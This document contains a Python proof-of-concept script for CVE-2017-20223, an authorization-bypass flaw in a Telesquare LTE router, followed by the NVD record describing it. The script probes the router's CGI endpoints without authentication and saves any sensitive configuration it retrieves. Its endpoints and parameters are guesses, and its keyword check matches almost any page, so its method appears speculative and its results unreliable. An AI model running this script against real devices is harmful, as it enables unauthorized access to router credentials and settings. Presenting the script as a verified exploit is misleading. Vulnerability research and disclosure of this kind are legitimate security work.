CVE-2017-20223

#!/usr/bin/env python3 """ CVE-2017-20223 PoC - Telesquare SKT LTE Router SDT-CS3B1 IDOR Vulnerability This PoC demonstrates the Insecure Direct Object Reference vulnerability in Telesquare SKT LTE Router SDT-CS3B1 firmware version 1.2.0 Note: This is for educational and authorized testing purposes only. """ import requests import sys import json # Target router IP address (replace with actual target) TARGET_IP = "192.168.1.1" TARGET_PORT = 80 TARGET_URL = f"http://{TARGET_IP}:{TARGET_PORT}" def check_vulnerability(): """ Check if the target router is vulnerable to CVE-2017-20223 """ print(f"[*] Testing target: {TARGET_URL}") print("[*] Checking for IDOR vulnerability (CVE-2017-20223)") # Common endpoints that might be vulnerable vulnerable_endpoints = [ "/cgi-bin/admin.cgi", "/cgi-bin/system.cgi", "/cgi-bin/network.cgi", "/cgi-bin/wireless.cgi", "/cgi-bin/security.cgi" ] # Test parameters that might be manipulated test_params = [ {"id": "1"}, {"config_id": "1"}, {"page": "admin"}, {"mode": "read"}, {"section": "system"} ] for endpoint in vulnerable_endpoints: for params in test_params: try: url = TARGET_URL + endpoint print(f"[*] Testing: {url} with params: {params}") # Send request without authentication response = requests.get(url, params=params, timeout=5) # Check if we got unauthorized access if response.status_code == 200: content = response.text.lower() # Check for sensitive information indicators if any(keyword in content for keyword in ['password', 'admin', 'ssid', 'key', 'wpa', 'dns', 'ip']): print(f"[!] Potential vulnerability found at {endpoint}") print(f"[!] Response contains sensitive data") return True except requests.exceptions.RequestException as e: print(f"[-] Error accessing {endpoint}: {e}") print("[*] No obvious vulnerability detected") return False def exploit_idor(endpoint, param_name, param_value): """ Attempt to exploit the IDOR vulnerability """ print(f"[*] Attempting IDOR exploit on {endpoint}") url = TARGET_URL + endpoint params = {param_name: param_value} try: response = requests.get(url, params=params, timeout=5) if response.status_code == 200: print(f"[!] Successfully accessed resource with {param_name}={param_value}") print(f"[*] Response length: {len(response.text)} bytes") # Save response for analysis with open("idor_response.txt", "w") as f: f.write(response.text) print("[*] Response saved to idor_response.txt") return response.text except requests.exceptions.RequestException as e: print(f"[-] Exploit failed: {e}") return None if __name__ == "__main__": print("=" * 60) print("CVE-2017-20223 IDOR Vulnerability PoC") print("Target: Telesquare SKT LTE Router SDT-CS3B1") print("=" * 60) if len(sys.argv) > 1: TARGET_IP = sys.argv[1] TARGET_URL = f"http://{TARGET_IP}:{TARGET_PORT}" if check_vulnerability(): print("\n[!] Target appears to be vulnerable!") print("[!] Manual verification recommended") else: print("\n[*] Target may not be vulnerable or is not reachable")

{"cve": {"id": "CVE-2017-20223", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:17:52.347", "lastModified": "2026-04-14T16:57:27.823", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Telesquare SKT LTE Router SDT-CS3B1 firmware version 1.2.0 contains an insecure direct object reference vulnerability that allows attackers to bypass authorization and access resources by manipulating user-supplied input parameters. Attackers can directly reference objects in the system to retrieve sensitive information and access functionalities without proper access controls."}, {"lang": "es", "value": "La versión de firmware 1.2.0 del Telesquare SKT LTE Router SDT-CS3B1 contiene una vulnerabilidad de referencia directa a objeto insegura que permite a los atacantes eludir la autorización y acceder a recursos manipulando parámetros de entrada proporcionados por el usuario. Los atacantes pueden referenciar directamente objetos en el sistema para recuperar información sensible y acceder a funcionalidades sin los controles de acceso adecuados."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:telesquare:sdt-cs3b1_firmware:1.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "1CB1EF95-F220-467F-903C-0727F5250CF2"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:telesquare:sdt-cs3b1:-:*:*:*:*:*:*:*", "matchCriteriaId": "81DED0D5-BDBB-4310-BD2D-0F4ED27B274B"}]}]}], "references": [{"url": "https://cxsecurity.com/issue/WLB-2017120297", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/136993", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://packetstormsecurity.com/files/145551", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/43402/", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/telesquare-skt-lte-router-sdt-cs3b1-insecure-direct-object-reference", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5445.php", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}